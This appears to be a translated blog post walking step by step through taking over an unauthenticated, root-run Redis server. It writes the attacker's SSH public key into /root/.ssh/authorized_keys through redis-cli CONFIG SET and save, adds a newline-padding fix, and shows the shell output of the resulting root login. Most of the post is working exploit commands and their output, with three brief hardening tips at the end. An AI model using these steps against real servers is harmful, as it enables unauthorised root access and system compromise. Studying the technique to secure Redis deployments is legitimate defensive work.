redis attacks remote login

As for Redis, it has been announced long ago. Like MongoDB, it is also caused by default listening to the public IP port, no authentication and using root user startup.

Prepare two machines
10.10.0.122 attack server, tester
10.0.0.91 start redis, open public network, no password, root start, default port
Generate your own public and private keys, and enter the SSH keygen command (just press enter all the way, the God ignores it)

Remote connection to redis on machine 122

[root@localhost ~]# cat /root/.ssh/id_rsa.pub | redis-cli -h 10.10.0.91 -p 6379 -x set ssh-key
OK
[root@localhost ~]# redis-cli -h 10.10.0.91
10.10.0.91:6379> get ssh-key
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGqmQvQsc7PWmZX6AQU03vnuU1N5JlptmK6dmbT/HZeVrfb2kVtdUV9Nqndf3VSi7OWPZVP2lYgg17EpGk4LOGrh0lq05asSkbYImt7wLGT6ccp7jlfaybqQ3P1RVrJyrZq339eZ8sbGYzvWV/MEZGxgpKzqOfT6797si92P6Ba+9GHkFWifM/X138HFRK1tPtQMvRs5Sb/atOMHLI1+pXthPZyz8IcoN6BbD56SKZuK0bie+nLPEmbxeVXAM0Leq26wSW1XHhhKaFfRSZspl0LZGNramzgRyAmvE8jD4qs0tmWkB+FcvEmBYyCJ/q9BmzSi+E24tlcQ+aG7GoUr5N root@localhost.localdomain\n"
10.10.0.91:6379> CONFIG SET dir /root/.ssh
OK
10.10.0.91:6379> CONFIG SET dbfilename "authorized_keys"
OK
10.10.0.91:6379> save
OK
10.10.0.91:6379> 

There is a problem here, because there is no carriage return at the front of the ssh key, so the ssh line in the authorized_keys file is followed by the redis string content, and the authentication content fails. Simply add two line breaks before the value of the ssh key, or manually add two line breaks before the public key in / root/.ssh/id_rsa.pub (one line break is not OK, it has been tested, A line feed does not meet the ssh file format)

[root@localhost ~]# redis-cli -h 10.10.0.91
10.10.0.91:6379> get ssh-key
"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGqmQvQsc7PWmZX6AQU03vnuU1N5JlptmK6dmbT/HZeVrfb2kVtdUV9Nqndf3VSi7OWPZVP2lYgg17EpGk4LOGrh0lq05asSkbYImt7wLGT6ccp7jlfaybqQ3P1RVrJyrZq339eZ8sbGYzvWV/MEZGxgpKzqOfT6797si92P6Ba+9GHkFWifM/X138HFRK1tPtQMvRs5Sb/atOMHLI1+pXthPZyz8IcoN6BbD56SKZuK0bie+nLPEmbxeVXAM0Leq26wSW1XHhhKaFfRSZspl0LZGNramzgRyAmvE8jD4qs0tmWkB+FcvEmBYyCJ/q9BmzSi+E24tlcQ+aG7GoUr5N root@localhost.localdomain\n"
10.10.0.91:6379> 

After reset

[root@localhost ~]# ssh root@10.10.0.91
Last failed login: Tue Sep 11 17:46:26 CST 2018 from 10.10.0.122 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Tue Sep 11 17:08:40 2018 from 10.10.0.122
[root@localhost ~]# 

therefore
1. redis is still not open to the public network. It is better to modify the default port
2. redis should be encrypted. Do not use if password
3. It is better not to use root as the execution user of redis

Tags: ssh Redis network MongoDB

Posted on Thu, 02 Jan 2020 11:48:07 -0500 by penguinboy